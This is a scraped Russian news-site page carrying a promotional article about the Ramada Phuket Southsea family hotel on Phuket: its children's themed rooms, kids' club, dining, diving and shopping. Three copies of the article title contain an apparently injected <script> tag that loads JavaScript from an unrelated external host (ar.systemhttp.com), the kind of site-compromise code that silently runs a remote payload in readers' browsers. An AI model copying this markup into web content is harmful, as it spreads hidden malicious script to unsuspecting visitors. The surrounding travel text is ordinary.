Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Ramada Phuket Southsea: роскошный отель на Пхукете для всей семьи

Ramada Phuket Southsea: роскошный отель на Пхукете для всей семьи

11 июл 2013, 12:04    ismirnov
0 комментариев    6 972 просмотра

Ramada Phuket Southsea: роскошный отель на Пхукете <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для всей семьи

Рядом с одним из знаменитых белых песчаных пляжей Пхукета с названием Карон, расположился новый роскошный отель, ставший уже известным, не только на Пхукете, но и далеко за пределами этого идеального курорта.

 

Семейный отель под названием Ramada Phuket Southsea радушно примет гостей в свои 120 номеров, где могут провести приятный отдых родители вместе со своими детьми. В уютных номерах есть практически всё для комфортного проживания.

 

Постояльцы могут пользоваться феном, кондиционером, мини-баром, приборами для приготовления кофе и чая, сейфом, телевизором, а также бесплатным выходом в интернет. Каждый из апартаментов этой гостиницы имеет балконы, с которых можно обозревать великолепные виды популярного пляжа Карон.

 

Для детей, приехавших сюда с родителями, приготовлено масса развлечений.

 

Для маленьких гостей дизайн каждого номера отделан в интересном тематическом стиле, который не оставит равнодушным любого ребёнка.

 

Для девочек номера оборудованы в виде старинного замка, где стоят «настоящие» кровати для принцесс. Дизайн этих номеров выдержан в розовом цвете. Мальчиков же в номерах ждут фантастические «миры» далёкого космоса или глубоководного мира.

 

В двухэтажных номерах для детей есть игровые комнаты с современными игровыми консолями и многое другое, что только может пожелать ребёнок. В некоторых номерах есть джакузи, чему детвора тоже обрадуются. В этом отеле детки скучать не будут.

 

Также в отеле Ramada Phuket Southsea специально для маленьких гостей организован приключенческий клуб «Сиам».

Ramada Phuket Southsea: роскошный отель на Пхукете <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для всей семьи«Члены» этого клуба, возраст которых от 4 до 14 лет, могут купаться в бассейне с водной горкой и играть в развивающие игры. За детьми здесь присмотрят воспитатели.

 

А, если нужно, то тут посоветуют, в каком месте курорта можно всей семьёй хорошо отдохнуть или съездить на увлекательную экскурсию.

 

Для родителей тут тоже есть масса развлечений.

 

К примеру, для того чтобы вкусно и с комфортом поесть, можно отправиться в известное здесь кафе World News Coffee. Тут, в спокойной и приятной обстановке, повара угостят вас чудесными блюдами традиционной кухни и многими другими популярными «вкусностями». 

 

Для активного отдыха здесь созданы самые широкие возможности, и они удовлетворят всех «взрослых» отдыхающих. Такие виды отдыха, как рыбалка, дайвинг, подводное плавание в маске и с ластами приходятся всем по вкусу. А ещё можно просто отправиться на острова, где вы совершите незабываемое сафари.

 

Здесь есть специальная школа подводного плавания, а также организовывают специальные поездки по морю, в состав которых входят подводные погружения в местах удивительных коралловых рифов и сказочного мира подводных пещер.

 

Кроме всего прочего недалеко от семейной гостиницы находится знаменитое на весь Пхукет место шопинга и ночных развлечений.

 

Любители различных видов шопинга могут посетить продуктовые базары с шумными торговцами, уличные лавки и магазинчики до современных супермаркетов в западном стиле и бутиков.

 

В торговых кварталах можно купить традиционные поделки и сувениры местных ремесленников, изделия ювелиров, одежду и антиквариат, а также косметическую продукцию, изготовленную на основе натуральных масел и трав. Ramada Phuket Southsea: роскошный отель на Пхукете <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для всей семьи

И многое-многое другое.

 

Живописные поля гольф-клубов, отвечающие самым высоким мировым стандартам, понравятся всем искушённым любителям этой игры. А экзотический колорит местных ночных развлечений, кроме шумных и красочных дискотек, дополняют трансвеститы.

 

В общем, если хотите испытать незабываемые эмоции, то поезжайте в сказочный Тайланд.

Читайте также
20 сен 2010, 10:01    0 комментариев
На днях в столице России состоялся мастер-класс американского дизайнера Элисон Бергер, который посвящался секретам создания...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent